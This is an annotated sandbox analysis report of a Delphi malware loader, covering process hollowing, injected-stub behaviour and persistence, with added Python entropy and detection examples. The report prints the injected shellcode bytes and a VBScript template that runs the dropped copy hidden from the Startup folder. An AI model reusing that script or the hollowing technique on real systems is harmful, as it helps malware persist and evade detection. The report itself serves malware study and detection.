11.0
0-day

SHA256: 5e32d07c21d72fb6e5b1c48c92ab18268ff5121b8e2ccfda9740152d896e30c2
File name: 5adb65b33594aa52a676bf25702b4d8b.exe (the name is the sample's MD5; McAfee's detection name below carries the same prefix)
Analysis duration: 95s
Last analyzed:
File size: 1.3MB
Static detection / dynamic detection tags: 36TI6RRXEI8 AI SCORE=80 AIDETECTVM ALI2000015 ATTRIBUTE CLASSIC CONFIDENCE DATASTEALER DELF DELFINJECT DELPHILESS EMTN EMVB FAREIT FORMBOOK GENERICKD HIGH CONFIDENCE HIGHCONFIDENCE HPRCDN JAWNN JHFN KCLOUD KRYPTIK MALREP MALWARE2 MALWARE@#FUNOWVUBY8C9 MASSLOGGER NANOCORE SCORE SUSGEN THKOABO TSCOPE UHW@AMP55BCI UNSAFE X2094 ZELPHIF
The tokens worth reading are DELF/DELFINJECT/ZELPHIF (a Delphi injector/loader) and FAREIT, FORMBOOK, MASSLOGGER and NANOCORE (four different final payloads): vendors agree on the loader and disagree on what it delivers, which is typical for a loader that carries an encrypted payload in its resources.
鹰眼引擎 (Eagle Eye engine)
Not detected: no Eagle Eye engine result available.
Static verdict
Antivirus engines
Engine       Result                                Scan date  Engine version
McAfee       Fareit-FPQ!5ADB65B33594               20201210   6.0.6.653
Alibaba      Trojan:Win32/DelfInject.ali2000015    20190527   0.3.0.5
CrowdStrike  win/malicious_confidence_90% (W)      20190702   1.0
Baidu        (none)                                20190318   1.0.0.2
Avast        Win32:Malware-gen                     20201209   21.1.5827.0
Kingsoft     Win32.Troj.Undef.(kcloud)             20201210   2017.9.26.565
The scan dates span March 2019 to December 2020, so these are cached per-vendor results rather than one scan; the Baidu entry is from the oldest engine version and should not be read as a present-day miss.
Static indicators
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)
section CODE
section DATA
section BSS
The executable uses a known packer (1 event)
packer BobSoft Mini Delphi -> BoB / BobSoft
Both hits are weak on their own: CODE, DATA and BSS are the default section names the Borland/Delphi linker emits, and "BobSoft Mini Delphi" is a PEiD signature that fires on ordinary Delphi-compiled binaries. Together they say "compiled with Delphi", which matches the DELF/DELFINJECT/ZELPHIF vendor names above; the actual evidence of packing is the high-entropy .rsrc section reported under the dynamic indicators.
One or more processes crashed (9 events)

All nine exceptions are the same fault: exception_code 0xc0000005 (access violation), an empty exception.symbol, identical register values and an identical call stack except for mscoree.dll's load address, which changes from process to process. Only the timestamp and the faulting address differ:

Time               exception.address  mscoree frames (_CorValidateImage+0x83f / _CorExeMain+0xf62)
1619517163.87325   0xff3f1495         0x74804b0f / 0x74805d3d
1619517176.326875  0xfd6b1495         0x74a04b0f / 0x74a05d3d
1619517183.404625  0xff2c1495         0x749b4b0f / 0x749b5d3d
1619517189.514375  0xff381495         0x74a04b0f / 0x74a05d3d
1619517197.607375  0xff311495         0x749b4b0f / 0x749b5d3d
1619517206.732     0xff351495         0x74574b0f / 0x74575d3d
1619517215.232125  0xff4c1495         0x74524b0f / 0x74525d3d
1619517220.07625   0xff271495         0x74524b0f / 0x74525d3d
1619517226.49825   0xfd9c1495         0x74524b0f / 0x74525d3d

Shared stack trace, innermost frame first (the monitor labels each frame with the nearest export before and after it, so the function names are approximations, not real symbols):
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x750ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
djoerfscoske+0xae3f8 @ 0x4ae3f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ (per-process address, see table)
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ (per-process address, see table)
0x57005c

Shared register state:
registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol: (empty)
Status: success 0 0 for every event

What the trace says:
- The New_ntdll_LdrLoadDll@16 frame is the sandbox monitor's own hook on LdrLoadDll, not part of the sample; the fault is raised while a LoadLibraryExW call issued from the sample is being serviced.
- The faulting addresses (0xff3f1495, 0xfd6b1495, ...) lie above 0x80000000, in the kernel half of a 32-bit address space, where user-mode code cannot execute. The fault is therefore a transfer of control through a bad pointer, not a bug inside a mapped module. The low 16 bits are 0x1495 every time while the upper bits vary per process, which is what a pointer built from a per-process value plus a constant offset looks like.
- The bottom frame, 0x57005c, belongs to no loaded module. It sits in the same 0x0056xxxx-0x0057xxxx range as the entry point 0x00562050 that the loader writes into each child's EAX via NtSetContextThread (see the process injection indicators below), so mscoree's _CorExeMain, the native entry through which managed (.NET) executables start, was reached from injected code. That fits the NANOCORE and MASSLOGGER tags, both .NET families. djoerfscoske appearing as a module in the same stack is consistent with the children being launched from the dropped copy.
- There are nine crashes and nine NtSetContextThread/NtResumeThread pairs further down, and each fault lands one to two and a half seconds after the corresponding NtSetContextThread (161.45 -> 163.87, 175.01 -> 176.33, 181.86 -> 183.40, and so on). The loader hollows a child, the child dies in the injected stage, and the loader spawns the next one. Whether that is an anti-analysis check reacting to the hooked LdrLoadDll or a genuine bug in the stage cannot be determined from this report; the practical consequence is that the final payload never ran here, which is why the dynamic indicators show no C2 traffic.
Behavioral verdict
Dynamic indicators
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
Allocates read-write-execute memory (usually to unpack itself) (50 out of 282 events)

Every event below is a call on the process's own memory (process_handle 0xffffffff) requesting protection 64 (PAGE_EXECUTE_READWRITE), with stack_dep_bypass 0, stack_pivoted 0 and status "success 0 0". Only the varying fields are tabulated: "size" is region_size for NtAllocateVirtualMemory and length for NtProtectVirtualMemory, "allocation_type" applies to NtAllocateVirtualMemory only, and rows keep the report's order (grouped by process, not strictly by time).

Time               API                      PID   base_address  size     allocation_type                 heap_dep_bypass
1619513302.421681  NtAllocateVirtualMemory  3044  0x00990000    4096     4096 (MEM_COMMIT)               0
1619513302.577681  NtAllocateVirtualMemory  3044  0x009a0000    69632    12288 (MEM_COMMIT|MEM_RESERVE)  0
1619513302.577681  NtAllocateVirtualMemory  3044  0x024b0000    4096     12288 (MEM_COMMIT|MEM_RESERVE)  0
1619517160.842375  NtAllocateVirtualMemory  2868  0x00560000    4096     4096 (MEM_COMMIT)               0
1619517160.935375  NtAllocateVirtualMemory  2868  0x00570000    69632    12288 (MEM_COMMIT|MEM_RESERVE)  0
1619517160.951375  NtAllocateVirtualMemory  2868  0x005a0000    4096     12288 (MEM_COMMIT|MEM_RESERVE)  0
1619517162.40425   NtProtectVirtualMemory   2404  0x00400000    4096     n/a                             0
1619517162.43525   NtAllocateVirtualMemory  2404  0x02250000    2293760  8192 (MEM_RESERVE)              0
1619517162.43525   NtAllocateVirtualMemory  2404  0x02440000    4096     4096 (MEM_COMMIT)               1
1619517162.43525   NtAllocateVirtualMemory  2404  0x01fb0000    679936   12288 (MEM_COMMIT|MEM_RESERVE)  0
1619517162.43525   NtProtectVirtualMemory   2404  0x01fb2000    655360   n/a                             1
1619517163.79525   NtProtectVirtualMemory   2404  0x02092000    4096     n/a                             1
1619517163.79525   NtProtectVirtualMemory   2404  0x76351000    4096     n/a                             0
1619517163.79525   NtProtectVirtualMemory   2404  0x02092000    4096     n/a                             1
1619517163.79525   NtProtectVirtualMemory   2404  0x76353000    4096     n/a                             0
1619517163.79525   NtProtectVirtualMemory   2404  0x02092000    4096     n/a                             1
1619517163.79525   NtProtectVirtualMemory   2404  0x76354000    4096     n/a                             0
1619517163.79525   NtProtectVirtualMemory   2404  0x02092000    4096     n/a                             1
1619517163.79525   NtProtectVirtualMemory   2404  0x76351000    4096     n/a                             0
1619517163.79525   NtProtectVirtualMemory   2404  0x02092000    4096     n/a                             1
1619517163.79525   NtProtectVirtualMemory   2404  0x77d4f000    4096     n/a                             0
1619517163.79525   NtProtectVirtualMemory   2404  0x02092000    4096     n/a                             1
1619517163.79525   NtProtectVirtualMemory   2404  0x76353000    4096     n/a                             0
1619517163.81025   NtProtectVirtualMemory   2404  0x02092000    4096     n/a                             1
1619517163.81025   NtProtectVirtualMemory   2404  0x76351000    4096     n/a                             0
1619517163.81025   NtProtectVirtualMemory   2404  0x02092000    4096     n/a                             1
1619517163.81025   NtProtectVirtualMemory   2404  0x76351000    4096     n/a                             0
1619517163.81025   NtProtectVirtualMemory   2404  0x02092000    4096     n/a                             1
1619517163.81025   NtProtectVirtualMemory   2404  0x76354000    4096     n/a                             0
1619517163.81025   NtProtectVirtualMemory   2404  0x02092000    4096     n/a                             1
1619517163.81025   NtProtectVirtualMemory   2404  0x76351000    4096     n/a                             0
1619517162.82625   NtAllocateVirtualMemory  2060  0x00650000    4096     4096 (MEM_COMMIT)               0
1619517162.88925   NtAllocateVirtualMemory  2060  0x00660000    69632    12288 (MEM_COMMIT|MEM_RESERVE)  0
1619517162.90425   NtAllocateVirtualMemory  2060  0x00690000    4096     12288 (MEM_COMMIT|MEM_RESERVE)  0
1619517174.4205    NtAllocateVirtualMemory  3144  0x003f0000    4096     4096 (MEM_COMMIT)               0
1619517174.5765    NtAllocateVirtualMemory  3144  0x00560000    69632    12288 (MEM_COMMIT|MEM_RESERVE)  0
1619517174.5765    NtAllocateVirtualMemory  3144  0x00590000    4096     12288 (MEM_COMMIT|MEM_RESERVE)  0
1619517175.998875  NtProtectVirtualMemory   3220  0x00400000    4096     n/a                             0
1619517176.029875  NtAllocateVirtualMemory  3220  0x02000000    1638400  8192 (MEM_RESERVE)              0
1619517176.029875  NtAllocateVirtualMemory  3220  0x02150000    4096     4096 (MEM_COMMIT)               1
1619517176.029875  NtAllocateVirtualMemory  3220  0x01f30000    679936   12288 (MEM_COMMIT|MEM_RESERVE)  0
1619517176.029875  NtProtectVirtualMemory   3220  0x01f32000    655360   n/a                             1
1619517176.264875  NtProtectVirtualMemory   3220  0x00352000    4096     n/a                             1
1619517176.264875  NtProtectVirtualMemory   3220  0x76351000    4096     n/a                             0
1619517176.264875  NtProtectVirtualMemory   3220  0x00352000    4096     n/a                             1
1619517176.264875  NtProtectVirtualMemory   3220  0x76353000    4096     n/a                             0
1619517176.264875  NtProtectVirtualMemory   3220  0x00352000    4096     n/a                             1
1619517176.264875  NtProtectVirtualMemory   3220  0x76354000    4096     n/a                             0
1619517176.264875  NtProtectVirtualMemory   3220  0x00352000    4096     n/a                             1
1619517176.264875  NtProtectVirtualMemory   3220  0x76351000    4096     n/a                             0

Three patterns are visible:
- The loader instances (3044, 2868, 2060, 3144) each make the same three RWX allocations in their own process, 4096 then 69632 then 4096 bytes: staging buffers for the stub and parameter block that the injection indicators below show being written into other processes.
- The hollowed children (2404, 3220) each start by making the page at 0x00400000, their own PE header, writable and executable, then reserve a large range (2293760 and 1638400 bytes), commit one 4096-byte heap page, commit 679936 bytes (0xa6000) and re-protect 655360 bytes at offset 0x2000 into that block. That is a roughly 680 KB image being unpacked inside the child by the injected stage.
- The alternating 4096-byte NtProtectVirtualMemory calls that follow, a heap page (0x02092000 in 2404, 0x00352000 in 3220; heap_dep_bypass 1 is the monitor flagging a heap address) and then a page inside a loaded system DLL (0x76351000, 0x76353000, 0x76354000, and 0x77d4f000, which is ntdll+0x1f000 given ntdll's base of 0x77d30000 in the crash stack), are the shape of inline patching of API code: make the target page RWX, write, move to the next target. The report does not show what was written, so whether this installs hooks or removes them (the sandbox monitor's own hook on LdrLoadDll is visible in the crash stack) cannot be decided here.
Creates executable files on the filesystem (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\web.vbs
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 out of 57 events)
The binary likely contains encrypted or compressed data indicative of a packer (2 events)
entropy 7.62816245195963 section {'size_of_data': '0x000b5800', 'virtual_address': '0x000a2000', 'entropy': 7.62816245195963, 'name': '.rsrc', 'virtual_size': '0x000b5708'} description A section with a high entropy has been found
entropy 0.5381764269829503 description Overall entropy of this PE file is high
The two entropy figures are different quantities. 7.63 is the Shannon entropy (bits per byte, maximum 8) of the .rsrc section, whose 0xb5800 = 743424 bytes of raw data are therefore close to random: that is where the encrypted payload sits, and it is more than half of the 1.3MB file. 0.538 is not an entropy at all but the signature's summary ratio, the share of the PE's section data that lives in high-entropy sections; 743424 bytes out of a 1.3MB file gives roughly that value.
Expresses interest in specific running processes (1 event)
process djoerfscoske.exe
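The two entropy figures above are easy to conflate, so here is an added example (mine, not the sandbox's code) that computes both the per-section Shannon entropy and the "share of bytes in high-entropy sections" ratio over constructed section contents. The 6.8-bit threshold is what I recall Cuckoo's packer_entropy signature using and is an assumption, as is the section layout, which only stands in for a Delphi loader with a large blob in .rsrc.

```python
"""Per-section Shannon entropy and the 'overall' ratio reported by the sandbox.

Added example, not code from the report or the sandbox. Section contents are
constructed: a 16-value repeating pattern for CODE (entropy exactly 4.0 bits),
zero-filled DATA, and pseudo-random bytes for .rsrc.
"""
import math
import random
from collections import Counter

# Assumption: the per-section threshold above which the signature counts a
# section as "high entropy" (recalled from Cuckoo's packer_entropy signature).
HIGH_ENTROPY_BITS = 6.8


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant stream, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_report(sections):
    """sections: list of (name, raw_bytes).

    Returns ({name: entropy_bits}, ratio). The ratio is the share of all section
    bytes that sit in high-entropy sections; that is what the report's
    "Overall entropy of this PE file is high" figure (0.538) measures, not a
    Shannon entropy of the whole file.
    """
    per_section = {name: shannon_entropy(raw) for name, raw in sections}
    total = sum(len(raw) for _, raw in sections)
    high = sum(len(raw) for name, raw in sections if per_section[name] > HIGH_ENTROPY_BITS)
    return per_section, (high / total if total else 0.0)


def build_sample_sections():
    """Constructed stand-in: small code, empty data, one big random blob in .rsrc."""
    rng = random.Random(0xC0DE)
    return [
        ("CODE", bytes(range(16)) * 3750),                          # 60000 bytes, 4.0 bits/byte
        ("DATA", b"\x00" * 10000),                                   # 10000 bytes, 0.0 bits/byte
        (".rsrc", bytes(rng.getrandbits(8) for _ in range(70000))),  # 70000 bytes, ~8.0 bits/byte
    ]


if __name__ == "__main__":
    per, ratio = section_report(build_sample_sections())
    for name, bits in per.items():
        print(f"{name:6s} {bits:.3f} bits/byte")
    print(f"share of bytes in high-entropy sections: {ratio:.3f}")
```

With these inputs only .rsrc clears the threshold, so the ratio is 70000/140000 = 0.5; on the real sample the same arithmetic over the PE's section sizes is what yields 0.538.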
Repeatedly searches for a not-found process, you may want to run a web browser during analysis (27 events)
Every Process32NextW below failed, which is simply how a snapshot walk ends: the call returns FALSE once the last entry has been handed out, so each row marks the end of one complete pass over the process list, and the name and PID shown are most likely the last entry that pass returned (the structure is not updated by the failing call). Twenty-seven passes in about five minutes is a polling loop, consistent with the "Expresses interest in ... djoerfscoske.exe" indicator above. Two of the names that surface, inject-x86.exe and is32bit.exe, are the sandbox's own helper processes: the walk exposes them to the sample, and a sandbox-aware build could key on them. The "run a web browser" hint is generic signature text, not a finding about this sample.

Time               process_name              snapshot_handle  process_identifier
1619513302.577681  conhost.exe               0x0000010c       1376
1619517160.967375  inject-x86.exe            0x0000010c       1376
1619517162.95125   djoerfscoske.exe          0x0000010c       2060
1619517173.56025   djoerfscoske.exe          0x00000210       2060
1619517174.5925    inject-x86.exe            0x0000010c       3204
1619517176.982375  inject-x86.exe            0x0000010c       3372
1619517179.560375  djoerfscoske.exe          0x00000144       3280
1619517181.139     inject-x86.exe            0x0000010c       3452
1619517184.404875  inject-x86.exe            0x0000010c       3624
1619517186.092875  inject-x86.exe            0x00000130       3624
1619517187.654875  inject-x86.exe            0x0000010c       3708
1619517189.904625  djoerfscoske.exe          0x00000110       3776
1619517194.592625  dllhost.exe               0x0000018c       4020
1619517195.77925   inject-x86.exe            0x0000010c       2656
1619517198.46725   inject-x86.exe            0x0000010c       2448
1619517201.74825   GoogleUpdate.exe          0x00000148       2128
1619517203.670125  inject-x86.exe            0x0000010c       3200
1619517208.154625  inject-x86.exe            0x0000010c       3428
1619517210.467625  djoerfscoske.exe          0x00000138       2616
1619517213.076625  inject-x86.exe            0x0000010c       3512
1619517215.68525   inject-x86.exe            0x0000010c       3696
1619517217.67025   djoerfscoske.exe          0x00000134       3620
1619517218.42025   inject-x86.exe            0x0000010c       3808
1619517220.84225   inject-x86.exe            0x0000010c       2364
1619517222.49825   mscorsvw.exe              0x00000134       3108
1619517224.326875  is32bit.exe               0x0000010c       4052
1619517227.82675   googlecrashhandler64.exe  0x0000010c       3732
Status for every row: failed 0 0
Network
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14
172.217.0.0/16 is Google address space. A direct connection there with no DNS lookup is more plausibly a connectivity check than C2, and it is the only network event in the report, which fits the injected stage crashing before the payload could run.
Creates an Alternate Data Stream (ADS) (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe:ZoneIdentifier
The stream name without the dot is the sample's own: the injected stub shown in the WriteProcessMemory buffer below assembles the wide string ":ZoneIdentifier" one character at a time (the j:XjZ...jejr push/pop sequence). This is not Windows writing its mark-of-the-web stream, which is named "Zone.Identifier"; it is the sample creating a look-alike stream on its dropped copy.
Allocates execute permission to another process indicative of possible code injection (1 event)
Time & API Arguments Status Return Repeated
1619513303.139681
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
Installs itself for autorun at Windows startup (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\web.vbs
Deletes executed files from disk (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
Creates a thread using NtQueueApcThread in a remote process potentially indicative of process injection (2 events)
Process injection Process 3044 created a thread in remote process 2760
Time & API Arguments Status Return Repeated
1619513303.139681
NtQueueApcThread
thread_handle: 0x0000011c
process_identifier: 2760
function_address: 0x000b05c0
parameter: 0x000c0000
success 0 0
Potential code injection by writing to the memory of another process (2 events)
Time & API Arguments Status Return Repeated
1619513303.139681
WriteProcessMemory
process_identifier: 2760
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000114
base_address: 0x000b0000
success 1 0
1619513303.139681
WriteProcessMemory
process_identifier: 2760
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5adb65b33594aa52a676bf25702b4d8b.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5adb65b33594aa52a676bf25702b4d8b.exe" webseT xbB = creatEoBJEcT("WsCript.ShEll") XBB.run """%ls""", 0, False
process_handle: 0x00000114
base_address: 0x000c0000
success 1 0

Reading the calls into PID 2760 together (all at 1619513303.139681, handle 0x00000114): the 4096-byte RWX region at 0x000b0000 receives the first buffer, a position-independent stub, and NtQueueApcThread then points the APC routine at 0x000b05c0, 0x5c0 bytes into that stub, with the second buffer at 0x000c0000 as its parameter. Even in this mangled rendering the stub's method is readable: the "MZ" and "PE" comparisons together with the 0x3c and 0x78 offsets are an export-table walk, the long run of push-immediate/call pairs is hash-based API resolution, and the stack-built fragments "shel" "l32" and "user" "32" (visible as ÇEðshelÇEôl32 and ÇEøuserfÇEü32) assemble "shell32" and "user32" four bytes at a time so neither DLL name appears as a contiguous string; ".vbs" and ":ZoneIdentifier" are built the same way, one wide character per push/pop. The second buffer is the stub's parameter block, a set of strings the sandbox printed back to back: the original path in %TEMP%, the dropped copy under AppData\Roaming\appdata\, the quoted original path, the name "web", and a VBScript template with a printf-style %ls placeholder. Filled in, the template is the web.vbs dropped into the Startup folder: Set xbB = CreateObject("WScript.Shell") followed by XBB.Run """<path>""", 0, False, i.e. launch the target with a hidden window. The random casing (creatEoBJEcT, WsCript.ShEll) costs nothing because VBScript is case-insensitive; its only purpose is to break case-sensitive string signatures.
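As an added example (mine, not code from the report), the following decodes a string block of the kind written at 0x000c0000, renders the web.vbs template, and then checks the result with a case-folded match, which is exactly what the randomized casing is meant to defeat. The NUL separators, the latin-1 decoding, and the choice of the dropped copy as the %ls target are assumptions; the strings themselves are those shown in the report's second WriteProcessMemory buffer.

```python
"""Decode the injected stub's string block and detect the persistence script it expands to.

Added example, not code from the report. STRING_BLOCK is constructed from the
strings visible in the report, with NUL separators inserted where the sandbox's
display ran them together (separator and encoding are assumptions).
"""
import re

STRING_BLOCK = (
    rb"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5adb65b33594aa52a676bf25702b4d8b.exe" b"\x00"
    rb"C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe" b"\x00"
    rb'"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5adb65b33594aa52a676bf25702b4d8b.exe"' b"\x00"
    b"web" b"\x00"
    b'seT xbB = creatEoBJEcT("WsCript.ShEll")\r\nXBB.run """%ls""", 0, False' b"\x00"
)


def split_string_block(block: bytes) -> list:
    """Split a NUL-separated block into its strings (the empty trailing entry is dropped)."""
    return [s.decode("latin-1") for s in block.split(b"\x00") if s]


def render_startup_script(block: bytes, target: str) -> str:
    """Expand the VBScript template's %ls placeholder with the path it should launch.

    Which path fills the placeholder is the injected code's decision; passing
    it in explicitly keeps that assumption visible to the caller.
    """
    template = next(s for s in split_string_block(block) if "%ls" in s)
    return template.replace("%ls", target)


# Matches, on case-folded text, a WScript.Shell object whose .Run call passes
# window style 0 (hidden). A doubled quote inside a VBScript string literal is
# an escaped quote, so the path literal may legitimately contain "" sequences.
HIDDEN_RUN = re.compile(
    r'createobject\s*\(\s*"wscript\.shell"\s*\).*?\.run\s+"(?:[^"]|"")*"\s*,\s*0\s*,',
    re.S,
)


def normalize_vbs(source: str) -> str:
    """VBScript is case-insensitive, so fold case (and runs of blanks) before matching;
    the randomized casing in the template only defeats case-sensitive signatures."""
    return re.sub(r"[ \t]+", " ", source.lower())


def is_hidden_shell_launcher(source: str) -> bool:
    """True when the script creates WScript.Shell and Runs something with a hidden window."""
    return HIDDEN_RUN.search(normalize_vbs(source)) is not None


if __name__ == "__main__":
    strings = split_string_block(STRING_BLOCK)
    script = render_startup_script(STRING_BLOCK, strings[1])  # assumption: the dropped copy
    print(script)
    print("hidden launcher:", is_hidden_shell_launcher(script))
```

A naive case-sensitive search for CreateObject("WScript.Shell") misses this script; the folded match does not, and it also rejects a script that runs its target with a visible window (style 1), which keeps ordinary admin scripts out of the hit list.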
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (18 events)
Process injection Process 2868 called NtSetContextThread to modify thread in remote process 2404
Process injection Process 3144 called NtSetContextThread to modify thread in remote process 3220
Process injection Process 3396 called NtSetContextThread to modify thread in remote process 3464
Process injection Process 3648 called NtSetContextThread to modify thread in remote process 3716
Process injection Process 4048 called NtSetContextThread to modify thread in remote process 1320
Process injection Process 3084 called NtSetContextThread to modify thread in remote process 3236
Process injection Process 3440 called NtSetContextThread to modify thread in remote process 3520
Process injection Process 3736 called NtSetContextThread to modify thread in remote process 1664
Process injection Process 3780 called NtSetContextThread to modify thread in remote process 3320

All nine calls set the same context: thread_handle 0x0000011c, registers.eax 5644368 (0x00562050), registers.ebx 2130567168 (0x7efde000), every other logged register (eip, esp, edi, ebp, edx, esi, ecx) 0, status "success 0 0". Only the time and the target differ:

Time               target process_identifier
1619517161.451375  2404
1619517175.0145    3220
1619517181.857     3464
1619517188.357875  3716
1619517196.13925   1320
1619517205.029125  3236
1619517213.826625  3520
1619517219.09225   1664
1619517224.717875  3320

This is the RunPE / process-hollowing handshake. A process created suspended starts its first thread with EAX holding the image entry point and EBX holding the PEB address; 0x7efde000 is the usual location of the 32-bit PEB of a WoW64 process on Windows 7 x64, and the presence of googlecrashhandler64.exe in the process list above says this guest is 64-bit. The injector leaves EBX alone and overwrites EAX with 0x562050, the entry point of the image it has staged in the child, then resumes the thread (next indicator). The same entry address in all nine children, together with the parents' own RWX allocations at 0x00560000 and 0x00570000 (PIDs 2868 and 3144 above), says the staged image is placed at a fixed base rather than relocated. The nine targets are the nine processes whose access violations are listed under "One or more processes crashed": each child faults within one to two and a half seconds of its NtSetContextThread, and the loader then spawns and hollows the next one.
Resumed a suspended thread in a remote process potentially indicative of process injection (18 events)
Process injection Process 2868 resumed a thread in remote process 2404
Process injection Process 3144 resumed a thread in remote process 3220
Process injection Process 3396 resumed a thread in remote process 3464
Process injection Process 3648 resumed a thread in remote process 3716
Process injection Process 4048 resumed a thread in remote process 1320
